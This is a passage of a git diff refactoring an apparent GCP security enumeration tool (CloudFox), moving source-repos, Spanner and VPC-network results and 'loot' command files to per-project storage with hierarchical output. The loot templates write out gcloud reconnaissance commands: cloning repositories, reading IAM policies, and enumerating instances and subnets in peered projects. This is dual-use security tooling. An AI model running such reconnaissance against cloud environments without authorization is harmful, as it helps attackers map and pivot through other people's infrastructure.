addRepoToLoot(repo sourcereposservice.RepoInfo) { ) if repo.Size > 0 { - m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf("# Size: %d bytes\n", repo.Size) + lootFile.Contents += fmt.Sprintf("# Size: %d bytes\n", repo.Size) } if repo.MirrorConfig { - m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf("# Mirrors: %s\n", repo.MirrorURL) + lootFile.Contents += fmt.Sprintf("# Mirrors: %s\n", repo.MirrorURL) } if repo.PubsubConfigs > 0 { - m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf("# Pub/Sub Triggers: %d\n", repo.PubsubConfigs) + lootFile.Contents += fmt.Sprintf("# Pub/Sub Triggers: %d\n", repo.PubsubConfigs) } // IAM bindings summary if len(repo.IAMBindings) > 0 { - m.LootMap["sourcerepos-commands"].Contents += "# IAM Bindings:\n" + lootFile.Contents += "# IAM Bindings:\n" for _, binding := range repo.IAMBindings { - m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + lootFile.Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) } } - m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "\n# Clone repository:\n"+ "gcloud source repos clone %s --project=%s\n\n"+ "# Get IAM policy:\n"+ @@ -184,7 +200,76 @@ func (m *SourceReposModule) addRepoToLoot(repo sourcereposservice.RepoInfo) { // Output Generation // ------------------------------ func (m *SourceReposModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Repos table - one row per IAM binding + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *SourceReposModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project Name", + "Project ID", + "Name", + "Size", + "Mirror", + "Mirror URL", + "Triggers", + "Resource Role", + "Resource Principal", + } + + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Build project-level outputs + for projectID, repos := range m.ProjectRepos { + body := m.reposToTableBody(repos) + tables := []internal.TableFile{{ + Name: "source-repos", + Header: header, + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = SourceReposOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_SOURCEREPOS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *SourceReposModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { header := []string{ "Project Name", "Project ID", @@ -193,12 +278,63 @@ func (m *SourceReposModule) writeOutput(ctx context.Context, logger internal.Log "Mirror", "Mirror URL", "Triggers", - "IAM Role", - "IAM Member", + "Resource Role", + "Resource Principal", + } + + allRepos := m.getAllRepos() + body := m.reposToTableBody(allRepos) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } + tables := []internal.TableFile{ + { + Name: "source-repos", + Header: header, + Body: body, + }, + } + + output := SourceReposOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SOURCEREPOS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// reposToTableBody converts repos to table rows +func (m *SourceReposModule) reposToTableBody(repos []sourcereposservice.RepoInfo) [][]string { var body [][]string - for _, repo := range m.Repos { + for _, repo := range repos { sizeDisplay := "-" if repo.Size > 0 { if repo.Size > 1024*1024 { @@ -252,47 +388,5 @@ func (m *SourceReposModule) writeOutput(ctx context.Context, logger internal.Log }) } } - - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - - tables := []internal.TableFile{ - { - Name: "source-repos", - Header: header, - Body: body, - }, - } - - output := SourceReposOutput{ - Table: tables, - Loot: lootFiles, - } - - scopeNames := make([]string, len(m.ProjectIDs)) - for i, id := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(id) - } - - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - m.ProjectIDs, - scopeNames, - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SOURCEREPOS_MODULE_NAME) - m.CommandCounter.Error++ - } + return body } diff --git a/gcp/commands/spanner.go b/gcp/commands/spanner.go index 92bdb1e4..7dc9999e 100644 --- a/gcp/commands/spanner.go +++ b/gcp/commands/spanner.go @@ -29,10 +29,10 @@ Features: type SpannerModule struct { gcpinternal.BaseGCPModule - Instances []spannerservice.SpannerInstanceInfo - Databases []spannerservice.SpannerDatabaseInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectInstances map[string][]spannerservice.SpannerInstanceInfo // projectID -> instances + ProjectDatabases map[string][]spannerservice.SpannerDatabaseInfo // projectID -> databases + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } type SpannerOutput struct { @@ -50,28 +50,46 @@ func runGCPSpannerCommand(cmd *cobra.Command, args []string) { } module := &SpannerModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Instances: []spannerservice.SpannerInstanceInfo{}, - Databases: []spannerservice.SpannerDatabaseInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectInstances: make(map[string][]spannerservice.SpannerInstanceInfo), + ProjectDatabases: make(map[string][]spannerservice.SpannerDatabaseInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } func (m *SpannerModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SPANNER_MODULE_NAME, m.processProject) - if len(m.Instances) == 0 { + allInstances := m.getAllInstances() + allDatabases := m.getAllDatabases() + + if len(allInstances) == 0 { logger.InfoM("No Spanner instances found", globals.GCP_SPANNER_MODULE_NAME) return } logger.SuccessM(fmt.Sprintf("Found %d Spanner instance(s) with %d database(s)", - len(m.Instances), len(m.Databases)), globals.GCP_SPANNER_MODULE_NAME) + len(allInstances), len(allDatabases)), globals.GCP_SPANNER_MODULE_NAME) m.writeOutput(ctx, logger) } +func (m *SpannerModule) getAllInstances() []spannerservice.SpannerInstanceInfo { + var all []spannerservice.SpannerInstanceInfo + for _, instances := range m.ProjectInstances { + all = append(all, instances...) + } + return all +} + +func (m *SpannerModule) getAllDatabases() []spannerservice.SpannerDatabaseInfo { + var all []spannerservice.SpannerDatabaseInfo + for _, databases := range m.ProjectDatabases { + all = append(all, databases...) + } + return all +} + func (m *SpannerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Enumerating Spanner in project: %s", projectID), globals.GCP_SPANNER_MODULE_NAME) @@ -87,14 +105,23 @@ func (m *SpannerModule) processProject(ctx context.Context, projectID string, lo } m.mu.Lock() - m.Instances = append(m.Instances, result.Instances...) - m.Databases = append(m.Databases, result.Databases...) + m.ProjectInstances[projectID] = result.Instances + m.ProjectDatabases[projectID] = result.Databases + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["spanner-commands"] = &internal.LootFile{ + Name: "spanner-commands", + Contents: "# Spanner Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } for _, instance := range result.Instances { - m.addInstanceToLoot(instance) + m.addInstanceToLoot(projectID, instance) } for _, database := range result.Databases { - m.addDatabaseToLoot(database) + m.addDatabaseToLoot(projectID, database) } m.mu.Unlock() @@ -104,15 +131,12 @@ func (m *SpannerModule) processProject(ctx context.Context, projectID string, lo } } -func (m *SpannerModule) initializeLootFiles() { - m.LootMap["spanner-commands"] = &internal.LootFile{ - Name: "spanner-commands", - Contents: "# Spanner Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *SpannerModule) addInstanceToLoot(projectID string, instance spannerservice.SpannerInstanceInfo) { + lootFile := m.LootMap[projectID]["spanner-commands"] + if lootFile == nil { + return } -} - -func (m *SpannerModule) addInstanceToLoot(instance spannerservice.SpannerInstanceInfo) { - m.LootMap["spanner-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# ==========================================\n"+ "# INSTANCE: %s\n"+ "# ==========================================\n"+ @@ -127,13 +151,13 @@ func (m *SpannerModule) addInstanceToLoot(instance spannerservice.SpannerInstanc ) if len(instance.IAMBindings) > 0 { - m.LootMap["spanner-commands"].Contents += "# IAM Bindings:\n" + lootFile.Contents += "# IAM Bindings:\n" for _, binding := range instance.IAMBindings { - m.LootMap["spanner-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + lootFile.Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) } } - m.LootMap["spanner-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "\n# Describe instance:\n"+ "gcloud spanner instances describe %s --project=%s\n\n"+ "# List databases:\n"+ @@ -146,8 +170,12 @@ func (m *SpannerModule) addInstanceToLoot(instance spannerservice.SpannerInstanc ) } -func (m *SpannerModule) addDatabaseToLoot(database spannerservice.SpannerDatabaseInfo) { - m.LootMap["spanner-commands"].Contents += fmt.Sprintf( +func (m *SpannerModule) addDatabaseToLoot(projectID string, database spannerservice.SpannerDatabaseInfo) { + lootFile := m.LootMap[projectID]["spanner-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( "# ------------------------------------------\n"+ "# DATABASE: %s (Instance: %s)\n"+ "# ------------------------------------------\n"+ @@ -160,17 +188,17 @@ func (m *SpannerModule) addDatabaseToLoot(database spannerservice.SpannerDatabas ) if database.KmsKeyName != "" { - m.LootMap["spanner-commands"].Contents += fmt.Sprintf("# KMS Key: %s\n", database.KmsKeyName) + lootFile.Contents += fmt.Sprintf("# KMS Key: %s\n", database.KmsKeyName) } if len(database.IAMBindings) > 0 { - m.LootMap["spanner-commands"].Contents += "# IAM Bindings:\n" + lootFile.Contents += "# IAM Bindings:\n" for _, binding := range database.IAMBindings { - m.LootMap["spanner-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + lootFile.Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) } } - m.LootMap["spanner-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "\n# Describe database:\n"+ "gcloud spanner databases describe %s --instance=%s --project=%s\n\n"+ "# Get database IAM policy:\n"+ @@ -184,8 +212,15 @@ func (m *SpannerModule) addDatabaseToLoot(database spannerservice.SpannerDatabas } func (m *SpannerModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Instance table - one row per IAM binding - instanceHeader := []string{ + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *SpannerModule) getInstanceHeader() []string { + return []string{ "Project Name", "Project ID", "Instance", @@ -193,15 +228,31 @@ func (m *SpannerModule) writeOutput(ctx context.Context, logger internal.Logger) "Config", "Nodes", "State", - "IAM Role", - "IAM Member", + "Resource Role", + "Resource Principal", } +} - var instanceBody [][]string - for _, instance := range m.Instances { +func (m *SpannerModule) getDatabaseHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Instance", + "Database", + "State", + "Encryption", + "KMS Key", + "Resource Role", + "Resource Principal", + } +} + +func (m *SpannerModule) instancesToTableBody(instances []spannerservice.SpannerInstanceInfo) [][]string { + var body [][]string + for _, instance := range instances { if len(instance.IAMBindings) > 0 { for _, binding := range instance.IAMBindings { - instanceBody = append(instanceBody, []string{ + body = append(body, []string{ m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.Name, @@ -215,7 +266,7 @@ func (m *SpannerModule) writeOutput(ctx context.Context, logger internal.Logger) } } else { // Instance with no IAM bindings - instanceBody = append(instanceBody, []string{ + body = append(body, []string{ m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.Name, @@ -228,22 +279,12 @@ func (m *SpannerModule) writeOutput(ctx context.Context, logger internal.Logger) }) } } + return body +} - // Database table - one row per IAM binding - databaseHeader := []string{ - "Project Name", - "Project ID", - "Instance", - "Database", - "State", - "Encryption", - "KMS Key", - "IAM Role", - "IAM Member", - } - - var databaseBody [][]string - for _, database := range m.Databases { +func (m *SpannerModule) databasesToTableBody(databases []spannerservice.SpannerDatabaseInfo) [][]string { + var body [][]string + for _, database := range databases { kmsKey := "-" if database.KmsKeyName != "" { kmsKey = database.KmsKeyName @@ -251,7 +292,7 @@ func (m *SpannerModule) writeOutput(ctx context.Context, logger internal.Logger) if len(database.IAMBindings) > 0 { for _, binding := range database.IAMBindings { - databaseBody = append(databaseBody, []string{ + body = append(body, []string{ m.GetProjectName(database.ProjectID), database.ProjectID, database.InstanceName, @@ -265,7 +306,7 @@ func (m *SpannerModule) writeOutput(ctx context.Context, logger internal.Logger) } } else { // Database with no IAM bindings - databaseBody = append(databaseBody, []string{ + body = append(body, []string{ m.GetProjectName(database.ProjectID), database.ProjectID, database.InstanceName, @@ -278,32 +319,100 @@ func (m *SpannerModule) writeOutput(ctx context.Context, logger internal.Logger) }) } } + return body +} - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) +func (m *SpannerModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if instances, ok := m.ProjectInstances[projectID]; ok && len(instances) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "spanner-instances", + Header: m.getInstanceHeader(), + Body: m.instancesToTableBody(instances), + }) + } + + if databases, ok := m.ProjectDatabases[projectID]; ok && len(databases) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "spanner-databases", + Header: m.getDatabaseHeader(), + Body: m.databasesToTableBody(databases), + }) + } + + return tableFiles +} + +func (m *SpannerModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectInstances { + projectIDs[projectID] = true + } + for projectID := range m.ProjectDatabases { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } + + outputData.ProjectLevelData[projectID] = SpannerOutput{Table: tableFiles, Loot: lootFiles} } - // Build tables - tables := []internal.TableFile{ - { + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_SPANNER_MODULE_NAME) + } +} + +func (m *SpannerModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allInstances := m.getAllInstances() + allDatabases := m.getAllDatabases() + + var tables []internal.TableFile + + if len(allInstances) > 0 { + tables = append(tables, internal.TableFile{ Name: "spanner-instances", - Header: instanceHeader, - Body: instanceBody, - }, + Header: m.getInstanceHeader(), + Body: m.instancesToTableBody(allInstances), + }) } - if len(databaseBody) > 0 { + if len(allDatabases) > 0 { tables = append(tables, internal.TableFile{ Name: "spanner-databases", - Header: databaseHeader, - Body: databaseBody, + Header: m.getDatabaseHeader(), + Body: m.databasesToTableBody(allDatabases), }) } + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + output := SpannerOutput{ Table: tables, Loot: lootFiles, diff --git a/gcp/commands/vpcnetworks.go b/gcp/commands/vpcnetworks.go index 934f31eb..bfb338bc 100644 --- a/gcp/commands/vpcnetworks.go +++ b/gcp/commands/vpcnetworks.go @@ -30,12 +30,12 @@ Features: type VPCNetworksModule struct { gcpinternal.BaseGCPModule - Networks []vpcservice.VPCNetworkInfo - Subnets []vpcservice.SubnetInfo - Peerings []vpcservice.VPCPeeringInfo - Routes []vpcservice.RouteInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectNetworks map[string][]vpcservice.VPCNetworkInfo // projectID -> networks + ProjectSubnets map[string][]vpcservice.SubnetInfo // projectID -> subnets + ProjectPeerings map[string][]vpcservice.VPCPeeringInfo // projectID -> peerings + ProjectRoutes map[string][]vpcservice.RouteInfo // projectID -> routes + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } type VPCNetworksOutput struct { @@ -53,30 +53,66 @@ func runGCPVPCNetworksCommand(cmd *cobra.Command, args []string) { } module := &VPCNetworksModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Networks: []vpcservice.VPCNetworkInfo{}, - Subnets: []vpcservice.SubnetInfo{}, - Peerings: []vpcservice.VPCPeeringInfo{}, - Routes: []vpcservice.RouteInfo{}, - LootMap: make(map[string]*internal.LootFile), - } - module.initializeLootFiles() + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectNetworks: make(map[string][]vpcservice.VPCNetworkInfo), + ProjectSubnets: make(map[string][]vpcservice.SubnetInfo), + ProjectPeerings: make(map[string][]vpcservice.VPCPeeringInfo), + ProjectRoutes: make(map[string][]vpcservice.RouteInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } func (m *VPCNetworksModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_VPCNETWORKS_MODULE_NAME, m.processProject) - if len(m.Networks) == 0 { + allNetworks := m.getAllNetworks() + allSubnets := m.getAllSubnets() + allPeerings := m.getAllPeerings() + allRoutes := m.getAllRoutes() + + if len(allNetworks) == 0 { logger.InfoM("No VPC networks found", globals.GCP_VPCNETWORKS_MODULE_NAME) return } logger.SuccessM(fmt.Sprintf("Found %d VPC network(s), %d subnet(s), %d peering(s), %d route(s)", - len(m.Networks), len(m.Subnets), len(m.Peerings), len(m.Routes)), globals.GCP_VPCNETWORKS_MODULE_NAME) + len(allNetworks), len(allSubnets), len(allPeerings), len(allRoutes)), globals.GCP_VPCNETWORKS_MODULE_NAME) m.writeOutput(ctx, logger) } +func (m *VPCNetworksModule) getAllNetworks() []vpcservice.VPCNetworkInfo { + var all []vpcservice.VPCNetworkInfo + for _, networks := range m.ProjectNetworks { + all = append(all, networks...) + } + return all +} + +func (m *VPCNetworksModule) getAllSubnets() []vpcservice.SubnetInfo { + var all []vpcservice.SubnetInfo + for _, subnets := range m.ProjectSubnets { + all = append(all, subnets...) + } + return all +} + +func (m *VPCNetworksModule) getAllPeerings() []vpcservice.VPCPeeringInfo { + var all []vpcservice.VPCPeeringInfo + for _, peerings := range m.ProjectPeerings { + all = append(all, peerings...) + } + return all +} + +func (m *VPCNetworksModule) getAllRoutes() []vpcservice.RouteInfo { + var all []vpcservice.RouteInfo + for _, routes := range m.ProjectRoutes { + all = append(all, routes...) + } + return all +} + func (m *VPCNetworksModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Enumerating VPC networks in project: %s", projectID), globals.GCP_VPCNETWORKS_MODULE_NAME) @@ -84,6 +120,17 @@ func (m *VPCNetworksModule) processProject(ctx context.Context, projectID string svc := vpcservice.New() + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["vpcnetworks-commands"] = &internal.LootFile{ + Name: "vpcnetworks-commands", + Contents: "# VPC Networks Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + // Get networks networks, err := svc.ListVPCNetworks(projectID) if err != nil { @@ -92,7 +139,10 @@ func (m *VPCNetworksModule) processProject(ctx context.Context, projectID string fmt.Sprintf("Could not list VPC networks in project %s", projectID)) } else { m.mu.Lock() - m.Networks = append(m.Networks, networks...) + m.ProjectNetworks[projectID] = networks + for _, network := range networks { + m.addNetworkToLoot(projectID, network) + } m.mu.Unlock() } @@ -100,7 +150,10 @@ func (m *VPCNetworksModule) processProject(ctx context.Context, projectID string subnets, err := svc.ListSubnets(projectID) if err == nil { m.mu.Lock() - m.Subnets = append(m.Subnets, subnets...) + m.ProjectSubnets[projectID] = subnets + for _, subnet := range subnets { + m.addSubnetToLoot(projectID, subnet) + } m.mu.Unlock() } @@ -108,7 +161,10 @@ func (m *VPCNetworksModule) processProject(ctx context.Context, projectID string peerings, err := svc.ListVPCPeerings(projectID) if err == nil { m.mu.Lock() - m.Peerings = append(m.Peerings, peerings...) + m.ProjectPeerings[projectID] = peerings + for _, peering := range peerings { + m.addPeeringToLoot(projectID, peering) + } m.mu.Unlock() } @@ -116,32 +172,17 @@ func (m *VPCNetworksModule) processProject(ctx context.Context, projectID string routes, err := svc.ListRoutes(projectID) if err == nil { m.mu.Lock() - m.Routes = append(m.Routes, routes...) + m.ProjectRoutes[projectID] = routes m.mu.Unlock() } - - m.mu.Lock() - for _, network := range networks { - m.addNetworkToLoot(network) - } - for _, subnet := range subnets { - m.addSubnetToLoot(subnet) - } - for _, peering := range peerings { - m.addPeeringToLoot(peering) - } - m.mu.Unlock() } -func (m *VPCNetworksModule) initializeLootFiles() { - m.LootMap["vpcnetworks-commands"] = &internal.LootFile{ - Name: "vpcnetworks-commands", - Contents: "# VPC Networks Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *VPCNetworksModule) addNetworkToLoot(projectID string, network vpcservice.VPCNetworkInfo) { + lootFile := m.LootMap[projectID]["vpcnetworks-commands"] + if lootFile == nil { + return } -} - -func (m *VPCNetworksModule) addNetworkToLoot(network vpcservice.VPCNetworkInfo) { - m.LootMap["vpcnetworks-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# ==========================================\n"+ "# NETWORK: %s\n"+ "# ==========================================\n"+ @@ -168,8 +209,12 @@ func (m *VPCNetworksModule) addNetworkToLoot(network vpcservice.VPCNetworkInfo) ) } -func (m *VPCNetworksModule) addSubnetToLoot(subnet vpcservice.SubnetInfo) { - m.LootMap["vpcnetworks-commands"].Contents += fmt.Sprintf( +func (m *VPCNetworksModule) addSubnetToLoot(projectID string, subnet vpcservice.SubnetInfo) { + lootFile := m.LootMap[projectID]["vpcnetworks-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( "# ------------------------------------------\n"+ "# SUBNET: %s (Network: %s)\n"+ "# ------------------------------------------\n"+ @@ -190,8 +235,12 @@ func (m *VPCNetworksModule) addSubnetToLoot(subnet vpcservice.SubnetInfo) { ) } -func (m *VPCNetworksModule) addPeeringToLoot(peering vpcservice.VPCPeeringInfo) { - m.LootMap["vpcnetworks-commands"].Contents += fmt.Sprintf( +func (m *VPCNetworksModule) addPeeringToLoot(projectID string, peering vpcservice.VPCPeeringInfo) { + lootFile := m.LootMap[projectID]["vpcnetworks-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( "# ------------------------------------------\n"+ "# PEERING: %s\n"+ "# ------------------------------------------\n"+ @@ -210,7 +259,7 @@ func (m *VPCNetworksModule) addPeeringToLoot(peering vpcservice.VPCPeeringInfo) // Cross-project peering commands if peering.PeerProjectID != "" && peering.PeerProjectID != peering.ProjectID { - m.LootMap["vpcnetworks-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "\n# Cross-project peering - enumerate peer project:\n"+ "gcloud compute instances list --project=%s\n"+ "gcloud compute networks subnets list --project=%s\n\n", @@ -218,22 +267,42 @@ func (m *VPCNetworksModule) addPeeringToLoot(peering vpcservice.VPCPeeringInfo) peering.PeerProjectID, ) } else { - m.LootMap["vpcnetworks-commands"].Contents += "\n" + lootFile.Contents += "\n" } } func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Logger) { - var tables []internal.TableFile + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *VPCNetworksModule) getNetworksHeader() []string { + return []string{"Project Name", "Project ID", "Name", "Routing Mode", "Auto Subnets", "Subnets", "Peerings"} +} + +func (m *VPCNetworksModule) getSubnetsHeader() []string { + return []string{"Project Name", "Project ID", "Name", "Network", "Region", "CIDR", "Private Access", "Flow Logs"} +} + +func (m *VPCNetworksModule) getPeeringsHeader() []string { + return []string{"Project Name", "Project ID", "Name", "Network", "Peer Network", "Peer Project", "State", "Export Routes", "Import Routes"} +} - // Networks table - netHeader := []string{"Project Name", "Project ID", "Name", "Routing Mode", "Auto Subnets", "Subnets", "Peerings"} - var netBody [][]string - for _, network := range m.Networks { +func (m *VPCNetworksModule) getRoutesHeader() []string { + return []string{"Project Name", "Project ID", "Name", "Network", "Dest Range", "Next Hop Type", "Next Hop", "Priority"} +} + +func (m *VPCNetworksModule) networksToTableBody(networks []vpcservice.VPCNetworkInfo) [][]string { + var body [][]string + for _, network := range networks { autoSubnets := "No" if network.AutoCreateSubnetworks { autoSubnets = "Yes" } - netBody = append(netBody, []string{ + body = append(body, []string{ m.GetProjectName(network.ProjectID), network.ProjectID, network.Name, @@ -243,112 +312,217 @@ func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Log fmt.Sprintf("%d", len(network.Peerings)), }) } - tables = append(tables, internal.TableFile{ - Name: "vpc-networks", - Header: netHeader, - Body: netBody, - }) - - // Subnets table - if len(m.Subnets) > 0 { - subHeader := []string{"Project Name", "Project ID", "Name", "Network", "Region", "CIDR", "Private Access", "Flow Logs"} - var subBody [][]string - for _, subnet := range m.Subnets { - privateAccess := "No" - if subnet.PrivateIPGoogleAccess { - privateAccess = "Yes" - } - flowLogs := "No" - if subnet.EnableFlowLogs { - flowLogs = "Yes" - } - subBody = append(subBody, []string{ - m.GetProjectName(subnet.ProjectID), - subnet.ProjectID, - subnet.Name, - subnet.Network, - subnet.Region, - subnet.IPCidrRange, - privateAccess, - flowLogs, - }) + return body +} + +func (m *VPCNetworksModule) subnetsToTableBody(subnets []vpcservice.SubnetInfo) [][]string { + var body [][]string + for _, subnet := range subnets { + privateAccess := "No" + if subnet.PrivateIPGoogleAccess { + privateAccess = "Yes" } - tables = append(tables, internal.TableFile{ - Name: "subnets", - Header: subHeader, - Body: subBody, + flowLogs := "No" + if subnet.EnableFlowLogs { + flowLogs = "Yes" + } + body = append(body, []string{ + m.GetProjectName(subnet.ProjectID), + subnet.ProjectID, + subnet.Name, + subnet.Network, + subnet.Region, + subnet.IPCidrRange, + privateAccess, + flowLogs, }) } + return body +} - // Peerings table - if len(m.Peerings) > 0 { - peerHeader := []string{"Project Name", "Project ID", "Name", "Network", "Peer Network", "Peer Project", "State", "Export Routes", "Import Routes"} - var peerBody [][]string - for _, peering := range m.Peerings { - peerProject := peering.PeerProjectID - if peerProject == "" { - peerProject = "-" - } - exportRoutes := "No" - if peering.ExportCustomRoutes { - exportRoutes = "Yes" - } - importRoutes := "No" - if peering.ImportCustomRoutes { - importRoutes = "Yes" - } - peerBody = append(peerBody, []string{ - m.GetProjectName(peering.ProjectID), - peering.ProjectID, - peering.Name, - peering.Network, - peering.PeerNetwork, - peerProject, - peering.State, - exportRoutes, - importRoutes, - }) +func (m *VPCNetworksModule) peeringsToTableBody(peerings []vpcservice.VPCPeeringInfo) [][]string { + var body [][]string + for _, peering := range peerings { + peerProject := peering.PeerProjectID + if peerProject == "" { + peerProject = "-" } - tables = append(tables, internal.TableFile{ 